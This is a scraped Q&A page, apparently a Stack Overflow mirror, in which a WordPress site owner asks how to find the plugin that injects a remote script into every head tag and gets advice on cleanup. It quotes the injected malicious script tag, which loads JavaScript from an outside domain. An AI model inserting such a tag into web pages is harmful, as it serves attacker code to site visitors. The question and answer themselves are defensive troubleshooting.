Pergunta
It appears there is a new exploit/hack going around where a Wordpress plugin is writing a .js file before every closing </head> tags in every Wordpress installation's .php files on my server. It's writing this code before every closing head tag:
https://stackoverflow.com/questions/16013544
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
Russian<script language="JavaScript" src="http://abtt.tv/modules/mod_servises/ua.js" type="text/javascript"></script>
My question is, how would I go about finding which files are writing code to others? That way I can find which plugin it is doing it, as I have several installations of WP in subdomains that are infected, and no idea of which one it's coming from! I'm sure there has to be a way to monitor this, whether it be my hosting company doing it or me.
Solução
If your site has been compromised, your better of by restoring a backup, but if you dont have one you're probably better of with a clean installation. But if you still wanna try to "fix" it, there are some files you could check for starters, the header theme file, the function file and all the plugin files to ensure its not enqued in a plugin to run.
the function you should be searching for is called wp_enqueue_script
